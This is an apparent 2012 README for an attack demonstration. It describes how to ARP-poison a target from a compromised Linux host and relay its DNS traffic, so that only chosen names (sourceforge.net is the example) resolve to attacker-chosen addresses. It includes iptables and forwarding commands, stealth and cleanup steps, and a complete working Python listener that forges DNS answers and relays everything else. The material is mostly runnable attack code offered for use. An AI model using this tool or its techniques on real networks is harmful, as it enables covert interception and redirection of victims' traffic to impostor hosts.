Files:
  README.txt  2012-06-30  1.5 kB
  DNS.tgz     2012-06-30  2.0 kB
Short demonstration of how ARP-cache poisoning can be combined with DNS relaying ("tunneling" below: the target's queries are passed through the attacker's box to the real resolver) to carry out DNS-poisoning attacks without owning the DNS server, and in a way that is much less visible to the target, because only the names on a chosen list are answered falsely and every other lookup still gets the legitimate answer.

Suppose A is the attacker and T is the target. L is a compromised Linux host that A uses as a hop point; the interception below runs on L. D is the legitimate DNS server on the network.

1. A adds two rules to L's iptables:

 -  redirect incoming DNS requests (UDP port 53) to the DNS listener DNServer.pl. DNServer.pl is configured with the address of the real DNS server D, so every lookup that is not on the spoof list is answered correctly and nothing else on T breaks.

 -  SNAT (masquerade) all other packets that L forwards, so they leave L with L's own source address.

2. A turns on IP forwarding on L, so that once T is ARP-poisoned its non-DNS traffic to D is still delivered and T sees no change in its traffic.

3. A ARP-poisons T: forged ARP replies map D's IP address to L's MAC address, so packets T sends to D arrive at L instead.

   - if the traffic is not DNS, L forwards it to D as if L were T's gateway to D
   - if the traffic is DNS, it is redirected to the DNS listener
        - if the requested host is not on the spoof list, the request is relayed to D and D's answer is passed back unchanged
        - if the requested host is on the list, the listener returns a false IP for the domain. That could even be the IP address of A if other tunnels are set up there. Either way T believes it is talking to, say, sourceforge.net when it is not.

4. Cleanup (after the attack):

   - restore L's iptables rules and forwarding setting to whatever they were before
   - un-poison T's ARP cache by sending it D's real MAC address, so its traffic to D is normal again

In theory the entire process could take place in under a minute. Note that the effect lasts longer than the attack window: T caches the spoofed answer for the TTL the listener put in it, so a short poisoning run is enough for a lookup that T then reuses.
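The steps above describe three pieces: the iptables/forwarding setup on L, the ARP poisoning of T, and the selective DNS listener (DNServer.pl) that lies only about listed names and relays everything else to D. The following is an added example of that listener's logic in Python; it is not DNServer.pl and not code from the DNS.tgz archive. The listening port 5353, the upstream resolver address 192.0.2.53, the spoof list and the sample query are assumptions made up for the example; the setup commands in the module docstring are the standard sysctl/iptables equivalents of steps 1 and 2 and are not executed by the script.

```python
"""Selective DNS spoofer: the decision logic of the listener described in step 3.

Assumed host preparation on L (steps 1 and 2 of the README; run separately, as root):
  sysctl -w net.ipv4.ip_forward=1
  iptables -t nat -A PREROUTING  -p udp --dport 53 -j REDIRECT --to-ports 5353
  iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
The REDIRECT rule delivers T's port-53 queries to this script on port 5353; conntrack
rewrites the replies so T sees them coming from D's address and port 53.
"""
import socket
import struct

UPSTREAM_DNS = ("192.0.2.53", 53)           # D, the legitimate resolver (assumed address)
SPOOF = {"sourceforge.net": "192.0.2.10"}   # names to lie about -> IP to hand back (assumed)


def _read_name(pkt, off):
    """Read an uncompressed DNS name starting at pkt[off]; return (name, next_offset)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels).lower(), off
        if n & 0xC0:
            raise ValueError("compressed name in question section")
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n


def parse_query(pkt):
    """Return (txid, qname, qtype, question_bytes) for a single-question DNS query."""
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    qname, off = _read_name(pkt, 12)
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, qname, qtype, pkt[12:off + 4]


def forge_response(query, ip, ttl=60):
    """Build a standard-looking answer to `query` whose single A record points at `ip`."""
    txid, _, _, question = parse_query(query)
    # flags 0x8180: response, recursion desired + available, NOERROR
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    # name = pointer to offset 12 (the question name), type A, class IN, ttl, rdlen 4
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def handle(query, spoof=SPOOF):
    """Classify one query: ('spoof', forged reply), ('forward', None) or ('drop', None)."""
    try:
        _, qname, qtype, _ = parse_query(query)
    except (ValueError, struct.error, IndexError):
        return ("drop", None)
    if qtype == 1 and qname in spoof:          # only A lookups for listed names are faked
        return ("spoof", forge_response(query, spoof[qname]))
    return ("forward", None)                   # everything else goes to D untouched


def relay(query, upstream=UPSTREAM_DNS, timeout=2.0):
    """Tunnel a query to the real resolver D and return its answer unchanged."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, upstream)
        data, _ = s.recvfrom(4096)
    return data


def answer_ip(resp):
    """Extract the IPv4 address from the first A record of a reply built by forge_response."""
    _, off = _read_name(resp, 12)
    off += 4 + 2                               # QTYPE/QCLASS, then the 2-byte name pointer
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
    if rtype != 1 or rdlen != 4:
        raise ValueError("first answer is not an A record")
    return socket.inet_ntoa(resp[off + 10:off + 14])


def build_query(name, txid=0x1234):
    """Constructed sample input: a plain A query for `name` as a stub resolver would send it."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


def serve(port=5353):
    """Listener loop: spoof listed names, relay the rest to D, reply to T either way."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as srv:
        srv.bind(("0.0.0.0", port))
        while True:
            pkt, client = srv.recvfrom(4096)
            action, resp = handle(pkt)
            if action == "forward":
                try:
                    resp = relay(pkt)
                except socket.timeout:
                    continue
            if resp:
                srv.sendto(resp, client)


if __name__ == "__main__":
    serve()
```

The listener matches names case-insensitively and forges only A answers, so AAAA or MX lookups for a listed name still reach D; a listener that returned NXDOMAIN or dropped them instead would make the fake more consistent but also more visible. The transaction ID is copied from the query, which is all a stub resolver checks when the reply arrives from what it believes is D's address.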
Source: README.txt, updated 2012-06-30